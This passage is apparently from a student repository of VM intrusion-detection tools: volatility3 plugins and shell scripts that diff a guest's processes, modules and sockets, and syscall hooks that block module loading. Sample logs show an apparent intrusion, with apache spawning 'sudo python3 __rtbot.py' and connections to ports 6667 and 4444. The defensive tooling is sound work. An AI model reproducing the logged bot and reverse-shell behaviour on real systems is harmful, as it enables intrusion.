any of the plugins folder of volatility. It depends on `linux.lsof.Lsof`, `linux.findsocket.Findsocket`, `linux.pslist.Pslist` and its dependencies. \nIt has the following functions \n* `reload_memory` \n* `get_kern`\n* `get_proc`\n* `get_removed`\n* `get_added`\n* `writer`\n\n**`reload_memory`** clears the primary layer cache and reinitiates the memory layer. \n**`get_kern`** gets the name and offset of currently active kernals using the classmethod `lsmod.Lsmod.list_modules`, and adds a formatted string with the above parameters to a set and returns it. \n**`get_proc`** gets the pid, ppid and comm of currently active processes using the classmethod `pslist.PsList.list_tasks`, and adds a formatted string with the above parameters to a set and returns it. \n**`get_conn`** gets the data of currently active connections using the classmethod `pslist.PsList.list_tasks`, and adds a formatted string with the above parameters to a set and returns it. \n**`get_removed`** takes arguments prev and curr of the data obtained from one of the above commands and returns a set of removed entries. \n**`get_added`** takes arguments prev and curr of the data obtained from one of the above commands and returns a set of added entries. \n\n\n### **`logvm`**: Vidya Sagar\n\n`logvm` is a shell script which is placed in the ids folder to meet project requirements. It requires volatility3 folder to be placed in /root and the `linux.watched.Monitor` plugin and its dependencies. \n\n Usage: logvm <one-xxx> <time-interval>\n\nwhere, xxx is the id of the target machine and time-interval is the time between successive logs. \nThe script unmounts `/mnt` if it exists and mounts the `mem` of the machine < one-xxx > to it. \n\n### **`watchvm`**: Vidya Sagar\n\n`watchvm` is a shell script which is placed in the modwatch folder to meet the project requirements. It requires the libvmitrace library to be placed in /root folder. It also needs the modified version of `csec.cpp`, `SyscallLogger.cpp` and their dependencies to function properly. \n\n Usage: watchvm <one-xxx> [-p|--prevent|-prevent]\n\nwhere, is the id of the target machine and the optional options enable preventing init_module and finit_module syscalls when it doesn't meet the requirements.\n\nThe script unmounts `/mnt` and mounts the memory of the machine one-xxx at /mnt. Then builds the project with make. If the make fails, csec executable is not run. \n\n### **`csec.cpp`**: Mohamed Anis, Vidya Sagar\n\nThe default `csec.cpp` was modified to register only syscalls 175 and 313. \n\n Usage: csec <one-xxx> [1]\n\nwhere xxx is the id of the target system and the optional parameter prevents the syscalls when set. \n\n### **`SyscallLogger.cpp`**: Mohamed Anis, Vidya Sagar\n\nThe default `SyscallLogger.cpp` was modified to register perform required actions when syscalls 175 and 313. An addition parameter 'prevent' was added to the constructor to enable preventing syscalls when needed.\n\n---------------------\n\n### Miscellaneous \n\n#### `sim_syscall_175.c`: Mohamed Anis\n\nIt takes a command line argument which it uses as a image when calling the init_module function. It was used to test the functionality of `csec`.\n\n#### `run_syscall.sh`: Vidya Sagar\n\nIt takes one argument with the data, builds the sim_syscall_175.c and passes the argument when running its binary.\n\n#### `logs.sh`: Vidya Sagar\n\n Usage: logs.sh [prefix]\n\nwhere the prefix is appended to log files of commands ps, netstat and lsmod. \n\n#### `socket.c`: Mohamed Anis\n\nIt runs a simple server, it was used to test if the `linux.findsocket.FindSocket` plugin was working as intended.\n\n#### `server.py`: Mohamed Anis\n\nIt runs a simple server, it was used to test if the `linux.findsocket.FindSocket` plugin was working as intended.\n\n#### `get_diff.sh`: Vidya Sagar\n\nPrints the diff between the log files of the ps, netsta and lsmod commands prefixed with bf and af. \n\n```\n########################################## START PS DIFF ##########################################\n*** bf_ps.txt Fri Jul 2 16:34:45 2021\n--- af_ps.txt Fri Jul 2 16:43:32 2021\n***************\n*** 42,74 ****\n root 171 0.0 0.0 0 0 ? I< Jul01 0:00 [kworker/u3:0]\n root 173 0.0 0.0 0 0 ? S Jul01 0:00 [jbd2/xvda1-8]\n root 174 0.0 0.0 0 0 ? I< Jul01 0:00 [ext4-rsv-conver]\n! root 206 0.0 2.3 39084 8268 ? Ss Jul01 0:01 /lib/systemd/systemd-journald\n! root 218 0.0 1.3 21932 4852 ? Ss Jul01 0:00 /lib/systemd/systemd-udevd\n root 240 0.0 1.3 8084 4688 ? Ss Jul01 0:02 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\n root 262 0.0 0.0 0 0 ? I< Jul01 0:00 [ttm_swap]\n root 263 0.0 0.0 0 0 ? I< Jul01 0:00 [nfit]\n! root 301 0.0 1.1 225960 3848 ? Ssl Jul01 0:00 /usr/sbin/rsyslogd -n -iNONE\n! root 302 0.0 2.0 19428 7104 ? Ss Jul01 0:00 /lib/systemd/systemd-logind\n message+ 303 0.0 0.9 8612 3488 ? Ss Jul01 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only\n! unscd 304 0.0 0.4 2516 1560 ? Ss Jul01 0:00 /usr/sbin/nscd -d\n root 305 0.0 0.7 7180 2600 ? Ss Jul01 0:00 /usr/sbin/cron -f\n! root 736 0.0 0.2 4088 756 hvc0 Ss+ Jul01 0:00 /sbin/agetty -o -p -- \\u --keep-baud 115200,38400,9600 hvc0 vt220\n root 740 0.0 0.2 2564 748 tty1 Ss+ Jul01 0:00 /sbin/agetty -o -p -- \\u --noclear tty1 linux\n! ntp 743 0.0 0.9 76468 3156 ? Ssl Jul01 0:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -u 106:112\n! root 750 0.0 1.9 15768 6912 ? Ss Jul01 0:00 /usr/sbin/sshd -D\n! mysql 802 0.0 23.4 1254576 82068 ? Ssl Jul01 0:50 /usr/sbin/mysqld\n! root 804 0.0 9.2 234760 32196 ? Ss Jul01 0:04 /usr/sbin/apache2 -k start\n! www-data 2095 0.0 2.6 234784 9104 ? S 00:00 0:00 /usr/sbin/apache2 -k start\n! www-data 2096 0.0 2.6 234784 9104 ? S 00:00 0:00 /usr/sbin/apache2 -k start\n www-data 2097 0.0 3.0 234848 10612 ? S 00:00 0:00 /usr/sbin/apache2 -k start\n www-data 2098 0.0 2.6 234800 9104 ? S 00:00 0:00 /usr/sbin/apache2 -k start\n! www-data 2099 0.0 2.6 234784 9104 ? S 00:00 0:00 /usr/sbin/apache2 -k start\n! root 4002 0.0 0.0 0 0 ? I 16:09 0:00 [kworker/0:0-cgroup_destroy]\n! root 4031 0.0 0.0 0 0 ? I 16:28 0:00 [kworker/0:1-events_power_efficient]\n! root 4033 0.0 2.2 16612 7980 ? Ss 16:28 0:00 sshd: root@pts/0\n root 4036 0.0 2.3 21028 8272 ? Ss 16:28 0:00 /lib/systemd/systemd --user\n root 4037 0.0 0.6 104868 2420 ? S 16:28 0:00 (sd-pam)\n! root 4050 0.0 1.1 4708 4048 pts/0 Ss 16:28 0:00 -bash\n www-data 4066 0.0 2.6 234784 9104 ? S 16:33 0:00 /usr/sbin/apache2 -k start\n! root 4074 0.0 0.7 3652 2724 pts/0 S+ 16:34 0:00 /bin/bash ./logs.sh bf\n! root 4075 0.0 0.3 7556 1264 pts/0 R+ 16:34 0:00 ps -aux\n--- 42,79 ----\n root 171 0.0 0.0 0 0 ? I< Jul01 0:00 [kworker/u3:0]\n root 173 0.0 0.0 0 0 ? S Jul01 0:00 [jbd2/xvda1-8]\n root 174 0.0 0.0 0 0 ? I< Jul01 0:00 [ext4-rsv-conver]\n! root 206 0.0 2.3 39084 8216 ? Ss Jul01 0:01 /lib/systemd/systemd-journald\n! root 218 0.0 1.3 21932 4824 ? Ss Jul01 0:00 /lib/systemd/systemd-udevd\n root 240 0.0 1.3 8084 4688 ? Ss Jul01 0:02 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\n root 262 0.0 0.0 0 0 ? I< Jul01 0:00 [ttm_swap]\n root 263 0.0 0.0 0 0 ? I< Jul01 0:00 [nfit]\n! root 301 0.0 1.0 225960 3748 ? Ssl Jul01 0:00 /usr/sbin/rsyslogd -n -iNONE\n! root 302 0.0 2.0 19428 7088 ? Ss Jul01 0:00 /lib/systemd/systemd-logind\n message+ 303 0.0 0.9 8612 3488 ? Ss Jul01 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only\n! unscd 304 0.0 0.4 2516 1476 ? Ss Jul01 0:00 /usr/sbin/nscd -d\n root 305 0.0 0.7 7180 2600 ? Ss Jul01 0:00 /usr/sbin/cron -f\n! root 736 0.0 0.2 4088 752 hvc0 Ss+ Jul01 0:00 /sbin/agetty -o -p -- \\u --keep-baud 115200,38400,9600 hvc0 vt220\n root 740 0.0 0.2 2564 748 tty1 Ss+ Jul01 0:00 /sbin/agetty -o -p -- \\u --noclear tty1 linux\n! ntp 743 0.0 0.8 76468 3056 ? Ssl Jul01 0:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -u 106:112\n! root 750 0.0 1.9 15768 6832 ? Ss Jul01 0:00 /usr/sbin/sshd -D\n! mysql 802 0.0 23.5 1254876 82488 ? Ssl Jul01 0:51 /usr/sbin/mysqld\n! root 804 0.0 9.1 234760 31968 ? Ss Jul01 0:04 /usr/sbin/apache2 -k start\n! www-data 2095 0.0 5.4 234832 18944 ? S 00:00 0:00 /usr/sbin/apache2 -k start\n! www-data 2096 0.0 9.2 237112 32276 ? S 00:00 0:00 /usr/sbin/apache2 -k start\n www-data 2097 0.0 3.0 234848 10612 ? S 00:00 0:00 /usr/sbin/apache2 -k start\n www-data 2098 0.0 2.6 234800 9104 ? S 00:00 0:00 /usr/sbin/apache2 -k start\n! www-data 2099 0.0 9.4 309660 33052 ? S 00:00 0:00 /usr/sbin/apache2 -k start\n! root 4002 0.0 0.0 0 0 ? I 16:09 0:00 [kworker/0:0-events_power_efficient]\n! root 4031 0.0 0.0 0 0 ? I 16:28 0:00 [kworker/0:1-events]\n! root 4033 0.0 2.2 16612 7832 ? Ss 16:28 0:00 sshd: root@pts/0\n root 4036 0.0 2.3 21028 8272 ? Ss 16:28 0:00 /lib/systemd/systemd --user\n root 4037 0.0 0.6 104868 2420 ? S 16:28 0:00 (sd-pam)\n! root 4050 0.0 1.0 4708 3760 pts/0 Ss 16:28 0:00 -bash\n www-data 4066 0.0 2.6 234784 9104 ? S 16:33 0:00 /usr/sbin/apache2 -k start\n! www-data 4136 0.0 2.6 234784 9108 ? S 16:41 0:00 /usr/sbin/apache2 -k start\n! root 4138 0.0 0.0 0 0 ? I 16:41 0:00 [kworker/0:2]\n! www-data 4140 0.0 2.6 234784 9108 ? S 16:41 0:00 /usr/sbin/apache2 -k start\n! www-data 4147 0.0 0.1 2388 692 ? S 16:41 0:00 sh -c sudo python3 __rtbot.py\n! root 4148 0.0 0.9 7160 3372 ? S 16:41 0:00 sudo python3 __rtbot.py\n! root 4159 0.0 0.7 3652 2692 pts/0 S+ 16:43 0:00 /bin/bash ./logs.sh af\n! root 4160 0.0 0.3 7556 1208 pts/0 R+ 16:43 0:00 ps -aux\n########################################### END PS DIFF ###########################################\n\n########################################## START LSMOD DIFF ##########################################\n########################################### END LSMOD DIFF ###########################################\n\n########################################## START NETSTAT DIFF ##########################################\n*** bf_netstat.txt Fri Jul 2 16:34:45 2021\n--- af_netstat.txt Fri Jul 2 16:43:32 2021\n***************\n*** 2,11 ****\n Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name\n tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 802/mysqld\n tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 750/sshd\n tcp 0 36 192.168.13.245:22 10.42.13.11:51159 ESTABLISHED 4033/sshd: root@pts\n tcp6 0 0 :::80 :::* LISTEN 804/apache2\n tcp6 0 0 :::22 :::* LISTEN 750/sshd\n- tcp6 0 0 192.168.13.245:80 10.42.13.11:55377 FIN_WAIT2 -\n udp 0 0 192.168.13.245:123 0.0.0.0:* 743/ntpd\n udp 0 0 127.0.0.1:123 0.0.0.0:* 743/ntpd\n udp 0 0 0.0.0.0:123 0.0.0.0:* 743/ntpd\n--- 2,12 ----\n Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name\n tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 802/mysqld\n tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 750/sshd\n+ tcp 0 0 192.168.13.245:49364 192.168.13.19:6667 ESTABLISHED -\n tcp 0 36 192.168.13.245:22 10.42.13.11:51159 ESTABLISHED 4033/sshd: root@pts\n+ tcp 72 0 192.168.13.245:49200 192.168.13.19:4444 CLOSE_WAIT 4147/sh\n tcp6 0 0 :::80 :::* LISTEN 804/apache2\n tcp6 0 0 :::22 :::* LISTEN 750/sshd\n udp 0 0 192.168.13.245:123 0.0.0.0:* 743/ntpd\n udp 0 0 127.0.0.1:123 0.0.0.0:* 743/ntpd\n udp 0 0 0.0.0.0:123 0.0.0.0:* 743/ntpd\n***************\n*** 23,29 ****\n unix 2 [ ACC ] STREAM LISTENING 12663 304/nscd /var/run/nscd/socket\n unix 2 [ ACC ] STREAM LISTENING 12665 304/nscd /var/run/.nscd_socket\n unix 2 [ ACC ] STREAM LISTENING 15493 802/mysqld /run/mysqld/mysqld.sock\n! unix 7 [ ] DGRAM 10386 1/init /run/systemd/journal/dev-log\n unix 2 [ ACC ] SEQPACKET LISTENING 10164 1/init /run/udev/control\n unix 2 [ ACC ] STREAM LISTENING 12247 1/init /var/run/dbus/system_bus_socket\n unix 2 [ ] DGRAM 10208 1/init /run/systemd/journal/syslog\n--- 24,30 ----\n unix 2 [ ACC ] STREAM LISTENING 12663 304/nscd /var/run/nscd/socket\n unix 2 [ ACC ] STREAM LISTENING 12665 304/nscd /var/run/.nscd_socket\n unix 2 [ ACC ] STREAM LISTENING 15493 802/mysqld /run/mysqld/mysqld.sock\n! unix 8 [ ] DGRAM 10386 1/init /run/systemd/journal/dev-log\n unix 2 [ ACC ] SEQPACKET LISTENING 10164 1/init /run/udev/control\n unix 2 [ ACC ] STREAM LISTENING 12247 1/init /var/run/dbus/system_bus_socket\n unix 2 [ ] DGRAM 10208 1/init /run/systemd/journal/syslog\n***************\n*** 72,79 ****\n--- 73,83 ----\n unix 3 [ ] DGRAM 11464 1/init\n unix 2 [ ] DGRAM 33039 4033/sshd: root@pts\n unix 3 [ ] STREAM CONNECTED 33267 303/dbus-daemon /var/run/dbus/system_bus_socket\n+ unix 2 [ ] DGRAM 33867 4148/sudo\n unix 2 [ ] STREAM CONNECTED 33010 4033/sshd: root@pts\n+ unix 3 [ ] STREAM CONNECTED 33884 -\n unix 3 [ ] STREAM CONNECTED 15231 750/sshd\n+ unix 3 [ ] STREAM CONNECTED 33885 -\n unix 3 [ ] STREAM CONNECTED 15232 1/init /run/systemd/journal/stdout\n unix 3 [ ] STREAM CONNECTED 11540 1/init /run/systemd/journal/stdout\n unix 3 [ ] STREAM CONNECTED 12648 1/init /run/systemd/journal/stdout\n########################################### END NETSTAT DIFF ###########################################\n```\n\n" }, { "alpha_fraction": 0.6072797179222107, "alphanum_fraction": 0.6360152959823608, "avg_line_length": 15.838709831237793, "blob_id": "982771e754e15d1fe678c155adc57ddef1fec330", "content_id": "cb91838132d0cf2fa0c25cc3e59160d23d0fdbe6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 522, "license_type": "no_license", "max_line_length": 79, "num_lines": 31, "path": "/vm-logger/logvm", "repo_name": "SagaBegins/vmwatch", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# Kills program with name volatility3 in it\nfunction kill_monitor () {\n pkill -f volatility3\n}\n\ntrap 'kill_monitor' INT\n\nif [[ $1 == '' || $2 == '' ]]\nthen \n echo \"Usage: <path-to-$0>/$0 <one-XXXX> <TIME_INTERVAL>. Here one-1279\" \n exit 0\nfi\n\ntime_interval=$2\n\n# To make sure the correct vm is being monitored\nif [[ -f /mnt/mem ]]\nthen\n umount /mnt\nfi\n\nvmifs name $1 /mnt\n\nold_wd=$(pwd)\ncd /root/volatility3\n\npython3 -m vol -f /mnt/mem linux.watcher --time-interval $time_interval\n\ncd $old_wd\n" }, { "alpha_fraction": 0.4743083119392395, "alphanum_fraction": 0.4743083119392395, "avg_line_length": 18.461538314819336, "blob_id": "033ba3bdb6c9e91fb0e099ba0e65dafa32b632eb", "content_id": "c8d385df45a9976a3a69b0e9ceca83e5ad6346cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 253, "license_type": "no_license", "max_line_length": 48, "num_lines": 13, "path": "/scripts/get_diff.sh", "repo_name": "SagaBegins/vmwatch", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\ncomms=(ps lsmod netstat)\n\nsep=\"##########################################\"\n\nfor comm in \"${comms[@]}\"\ndo\n\techo \"$sep START ${comm^^} DIFF $sep\"\n\tdiff -u \"bf_${comm}.txt\" \"af_${comm}.txt\"\n\techo \"$sep# END ${comm^^} DIFF $sep#\"\n\techo ''\ndone\n" }, { "alpha_fraction": 0.5784313678741455, "alphanum_fraction": 0.5915032625198364, "avg_line_length": 15.94444465637207, "blob_id": "032d5c3d50301ac427b30d340c571d6bd60cf935", "content_id": "43140d8ddc47237b3acc6b0d894d6cd1d78e99c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 306, "license_type": "no_license", "max_line_length": 61, "num_lines": 18, "path": "/scripts/logs.sh", "repo_name": "SagaBegins/vmwatch", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nwhile [[ $# -gt 0 ]]\ndo\n\tcase $1 in\n\t-h|--help) \n\t\techo \"Usage: ./logs.sh <prefix>\"\n\t\techo \"logs ps, netstat and lsmod into <prefix>_command.txt\"\n\t\texit 0;;\n\t*)\n\t\tprefix=$1;;\n\tesac\n\tshift\ndone\n\nps -aux > \"${prefix}_ps.txt\"\nlsmod > \"${prefix}_lsmod.txt\"\nnetstat -nap > \"${prefix}_netstat.txt\"\n\n" }, { "alpha_fraction": 0.5388649702072144, "alphanum_fraction": 0.548547625541687, "avg_line_length": 39.18378448486328, "blob_id": "80b9d04aafa72c4b125228552669977108a31bf8", "content_id": "bf84657d622cf90fad5ebdf4a0d65b1d2cbc22bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7436, "license_type": "no_license", "max_line_length": 176, "num_lines": 185, "path": "/volatility3/plugins/linux/watcher.py", "repo_name": "SagaBegins/vmwatch", "src_encoding": "UTF-8", "text": "# This file is Copyright 2019 Volatility Foundation and licensed under the Volatility Software License 1.0\n# which is available at https://www.volatilityfoundation.org/license/vsl-v1.0\n#\n\"\"\"A module containing a collection of plugins that produce data typically\nfound in Linux's /proc file system.\"\"\"\n\nimport logging\nfrom typing import List, Iterable\n\nfrom volatility3.framework import contexts\nfrom volatility3.framework import exceptions, renderers, constants, interfaces\nfrom volatility3.framework.configuration import requirements\nfrom volatility3.framework.interfaces import plugins\nfrom volatility3.framework.objects import utility\nfrom volatility3.framework.renderers import format_hints\nfrom volatility3.plugins.linux import lsmod, findsocket, pslist\nfrom volatility3.cli import volargparse\nimport time\n\nvollog = logging.getLogger(__name__)\noffset_format = \"{0:<16}\"\nname_format = \"{0:<20}\"\nsize_format = \"{0:<10}\"\n\nclass Monitor(plugins.PluginInterface):\n \"\"\"Lists loaded kernel modules.\"\"\"\n \n CLI_NAME = 'volatility'\n\n _required_framework_version = (1, 0, 0)\n _version = (1, 0, 0)\n\n @classmethod\n def get_requirements(cls) -> List[interfaces.configuration.RequirementInterface]:\n return [\n requirements.TranslationLayerRequirement(name = 'primary',\n description = 'Memory layer for the kernel',\n architectures = [\"Intel32\", \"Intel64\"]),\n requirements.PluginRequirement(name = 'lsmod', plugin = lsmod.Lsmod, version = (1, 0, 0)),\n requirements.PluginRequirement(name = 'findsocket', plugin = findsocket.FindSocket, version = (1, 0, 0)),\n requirements.PluginRequirement(name = 'pslist', plugin = pslist.PsList, version = (1, 0, 0)),\n requirements.ListRequirement(name = 'time-interval',\n description = 'Time between each reads',\n element_type = int,\n default = [-1],\n optional = True),\n requirements.SymbolTableRequirement(name = \"vmlinux\", description = \"Linux kernel symbols\")\n ]\n\n def _generator(self):\n return\n\n def reload_memory(self):\n \n ml = self.context.layers['memory_layer']\n ml.__init__(ml.context, ml.config_path, ml.name)\n \n pl = self.context.layers[self.config['primary']]\n pl._get_valid_table.cache_clear()\n\n def get_conn(self):\n conn_set = set()\n for pid, _, name, protocol, laddr, faddr, _, full_path in findsocket.FindSocket.netstat(self.context, self.config['primary'], self.config['vmlinux'], self.config_path):\n l_to_f = f\"{laddr.strip():<21}\" +' > '+ f\"{faddr.strip():<21}\"\n pid_name = pid.strip()+'/'+name\n if 'UNIX' in protocol:\n conn_set.add(f\"{protocol:<6} {l_to_f:<50} {pid_name:<20} {full_path}\")\n else:\n conn_set.add(f\"{protocol:<6} {l_to_f:<50} {pid_name}\")\n\n return conn_set\n \n def get_proc(self):\n proc_set = set()\n for task in pslist.PsList.list_tasks(self.context, self.config['primary'], self.config['vmlinux']):\n pid = task.pid\n ppid = 0\n if task.parent:\n ppid = task.parent.pid\n name = utility.array_to_string(task.comm)\n proc_set.add(f\"{pid:<6} {ppid:<6} {name:<}\")\n\n return proc_set\n \n def get_kern(self):\n kern_set = set()\n for module in lsmod.Lsmod.list_modules(self.context, self.config['primary'], self.config['vmlinux']):\n name = utility.array_to_string(module.name)\n offset = module.vol.offset\n kern_set.add(f\"{hex(offset):<15} {name:<}\")\n\n return kern_set\n\n def get_missing(self, \n prev: set, \n curr: set) -> set:\n return prev - curr\n\n def get_added(self, \n prev: set, \n curr: set) -> set:\n return curr - prev\n \n def run(self): \n \"\"\"\n Write Doc string\n \"\"\"\n first_iter = True\n time_interval = self.config['time-interval'][0]\n self.reload_memory()\n\n print(f\"Logging Started {time.strftime('%d/%m/%Y %H:%M:%S',time.localtime())}. Interval {time_interval}s\")\n print(\"Ctrl+C to exit\\n\", flush = True)\n try:\n while True:\n exec_start_time = time.time()\n\n curr_kernals = self.get_kern()\n curr_processes = self.get_proc()\n curr_connections = self.get_conn()\n\n if not first_iter:\n stopped_processes = self.get_missing(prev_processes, curr_processes)\n unloaded_kernals = self.get_missing(prev_kernals, curr_kernals)\n closed_connections = self.get_missing(prev_connections, curr_connections)\n\n started_processes = self.get_added(prev_processes, curr_processes)\n loaded_kernals = self.get_added(prev_kernals, curr_kernals)\n new_connections = self.get_added(prev_connections, curr_connections)\n\n print(time.strftime(\"%d/%m/%Y %H:%M:%S\", time.localtime()))\n if len(stopped_processes) > 0 or len(started_processes) > 0:\n print(\"Processes: (pid, ppid, name)\")\n writer(stopped_processes, started_processes)\n else:\n print(\"No process update.\")\n \n if len(unloaded_kernals) > 0 or len(loaded_kernals) > 0:\n print(\"Kernal Modules: (offset, name)\")\n writer(unloaded_kernals, loaded_kernals)\n else:\n print(\"No kernal module update.\")\n\n if len(closed_connections) > 0 or len(new_connections) > 0: \n print(\"Network Sockets: (Protocol, laddr -> faddr, pid/name)\")\n writer(closed_connections, new_connections)\n else:\n print(\"No connection update.\")\n\n print(flush = True)\n else:\n first_iter = False\n\n # Copying current values \n prev_kernals = {kernal for kernal in curr_kernals}\n prev_processes = {process for process in curr_processes}\n prev_connections = {connection for connection in curr_connections}\n \n self.reload_memory()\n exec_end_time = time.time()\n # Adjusting sleep time based on the execution duration\n sleep_time = time_interval - (exec_end_time-exec_start_time)\n if sleep_time > 0:\n time.sleep(sleep_time)\n\n except KeyboardInterrupt as e:\n print(f\"Logging Stopped {time.strftime('%d/%m/%Y %H:%M:%S',time.localtime())}.\")\n \n return \n\ndef writer(missing_set: set, \n added_set: set):\n \"\"\"\n Write Doc string\n \"\"\"\n if len(missing_set) ==0 and len(added_set) == 0:\n return\n \n for deleted in missing_set:\n print(\"-\", deleted)\n \n for added in added_set:\n print(\"+\", added)\n \n print() \n\n" }, { "alpha_fraction": 0.5511363744735718, "alphanum_fraction": 0.5727272629737854, "avg_line_length": 14.17241382598877, "blob_id": "c73ce49296aec8ae9407cca5e0e76ff291d98d18", "content_id": "9aa031785e4ce8bc5faf2b4404eaced390777dd1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 880, "license_type": "no_license", "max_line_length": 55, "num_lines": 58, "path": "/vmwatcher/watchvm", "repo_name": "SagaBegins/vmwatch", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nfunction delete_empty_files () {\n\n # Deleting empty files in dumps\n find /root/vmwatcher/dumps/ -type f -size 0 -delete\n echo \"\"\n echo \"Exiting $0\"\n exit 0\n}\n\n# To catch ctrl+c\ntrap 'delete_empty_files' INT\n\n# Default arguments\nprevent=0\nvm='one-1279'\n\n# Parsing arguments\nwhile [[ $# != 0 ]] \ndo \n case $1 in \n -p | --prevent | -prevent ) \n prevent=1\n ;;\n one*)\n vm=\"$1\"\n ;;\n *)\n echo \"invalid argument\"\n ;;\n esac\n shift \ndone\n\n# unmounting /mnt if it exists\nif [[ -f /mnt/mem ]]\nthen\n umount /mnt\nfi\n\nvmifs name $vm /mnt \n\nold_wd=$(pwd)\n\n# Redirecting stdout to stderror \ncd /root/libvmtrace/build && make 1>&2 \n\n# Run if make builds without any errors\nif [[ $? == 0 ]]\nthen\n echo \"Started monitoring.\" 1>&2\n bin/csec $vm $prevent \nelse\n echo \"Make failed.\" 1>&2\nfi\n\ncd $old_wd\n" }, { "alpha_fraction": 0.5227485299110413, "alphanum_fraction": 0.5382887125015259, "avg_line_length": 41.89959716796875, "blob_id": "d47f2788ac0e25162e152eda8aa58ada69524096", "content_id": "a5e6cbe60696e9506f5e96f55e5016a9cff80561", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10682, "license_type": "no_license", "max_line_length": 248, "num_lines": 249, "path": "/volatility3/plugins/linux/findsocket.py", "repo_name": "SagaBegins/vmwatch", "src_encoding": "UTF-8", "text": "from ctypes import addressof, pointer\nimport logging\nfrom operator import sub\nfrom typing import Generic, Iterable, List\n\nfrom volatility3.framework import exceptions, interfaces, contexts\nfrom volatility3.framework import renderers, constants\nfrom volatility3.framework.configuration import requirements\nfrom volatility3.framework.interfaces import plugins, objects\nfrom volatility3.framework.renderers import format_hints\nfrom volatility3.cli.volshell import generic\nfrom volatility3.framework.symbols import linux\nfrom volatility3.framework.objects import utility\nfrom volatility3.plugins.linux import pslist\nfrom enum import Enum\n\nimport ipaddress\n\nvollog = logging.getLogger(__name__)\n\ntry:\n import capstone\n\n has_capstone = True\nexcept ImportError:\n has_capstone = False \n\nclass FindSocket(plugins.PluginInterface):\n \"\"\"Check system call table for hooks.\"\"\"\n\n _required_framework_version = (1, 0, 0)\n _version = (1, 0, 0)\n\n @classmethod\n def get_requirements(cls) -> List[interfaces.configuration.RequirementInterface]:\n return [\n requirements.TranslationLayerRequirement(name = 'primary',\n description = 'Memory layer for the kernel',\n architectures = [\"Intel32\", \"Intel64\"]),\n requirements.PluginRequirement(name = 'pslist', plugin = pslist.PsList, version = (1, 0, 0)),\n requirements.VersionRequirement(name = 'linuxutils', component = linux.LinuxUtilities, version = (1, 0, 0)),\n requirements.SymbolTableRequirement(name = \"vmlinux\", description = \"Linux kernel symbols\")\n ]\n \n def reload_memory(self):\n \"\"\"Reloads the memory from the memory dump.\"\"\"\n\n ml = self.context.layers['memory_layer']\n ml.__init__(ml.context, ml.config_path, ml.name)\n \n pl = self.context.layers[self.config['primary']]\n pl._get_valid_table.cache_clear()\n\n @classmethod\n def get_ip4(cls, \n ip_addr: int):\n return str(ipaddress.IPv4Address(big_to_little(ip_addr, 4))) \n \n @classmethod\n def get_ip6(cls, \n ip_addr: bytes):\n return str(ipaddress.IPv6Address(int.from_bytes(ip_addr, \"big\")))\n \n # TODO Write doc string\n @classmethod\n def netstat(cls, \n context: interfaces.context.ContextInterface, \n layer_name: str, \n symbol_table_name: str, \n config_path: str) -> Iterable[tuple]:\n \"\"\"Lists all the tasks in the primary layer.\n Args:\n context: The context to retrieve required elements (layers, symbol tables) from\n layer_name: The name of the layer on which to operate\n symbol_table_name: The name of the table containing the kernel symbols\n Yields:\n Process objects\n \"\"\"\n\n vmlinux = contexts.Module(context, symbol_table_name, layer_name, 0)\n \n shell = generic.Volshell(context = context, config_path = config_path)\n shell._current_layer = layer_name\n dt = shell.display_type\n \n sfop = vmlinux.object_from_symbol(\"socket_file_ops\")\n sfop_addr = sfop.vol.offset\n\n dfop = vmlinux.object_from_symbol(\"sockfs_dentry_operations\")\n\n dfop_addr = dfop.vol.offset\n\n stats = []\n\n for task in pslist.PsList.list_tasks(context, layer_name, symbol_table_name):\n pid = task.pid\n ppid = task.parent.pid\n comm = utility.array_to_string(task.comm)\n\n for _, filp, full_path in linux.LinuxUtilities.files_descriptors_for_process(context, symbol_table_name, task):\n if filp.is_readable() and (filp.f_op == sfop_addr or filp.f_path.dentry.d_op == dfop):\n socket = vmlinux.object(\"socket\", offset = filp.f_inode - 48)\n sk = socket.sk\n inet_sock = vmlinux.object(\"inet_sock\", offset = sk)\n sk_common = sk.__getattr__(\"__sk_common\")\n protocol = utility.array_to_string(sk_common.skc_prot.dereference().name)\n ref_count = sk_common.skc_refcnt.refs.counter\n net_ref_count = sk_common.skc_net_refcnt \n\n port = big_to_little(sk_common.skc_dport, 2)\n sport = big_to_little(inet_sock.inet_sport, 2)\n\n # if '6' in protocol:\n if protocol[-1] == '6':\n ipaddr = cls.get_ip6(sk_common.skc_v6_daddr.in6_u.u6_addr8)\n laddr = cls.get_ip6(sk_common.skc_v6_rcv_saddr.in6_u.u6_addr8)\n faddr = f\"[{ipaddr}]:{str(port)}\"\n laddr = f\"[{laddr}]:{str(sport)}\" \n else:\n ipaddr = cls.get_ip4(sk_common.skc_daddr)\n laddr = cls.get_ip4(sk_common.skc_rcv_saddr)\n faddr = ipaddr + ':' + str(port)\n laddr = laddr + ':' + str(sport) \n \n if \"TCP\" in protocol or \"UNIX\" in protocol and TcpStates.has_value(sk_common.skc_state):\n state = TcpStates(sk_common.skc_state).name\n else:\n state = \"\"\n\n ans = (f\"{pid:<6}\", f\"{ppid:<6}\", f\"{comm:<15}\", f\"{protocol:<8}\", \n f\"{laddr:<25}\", 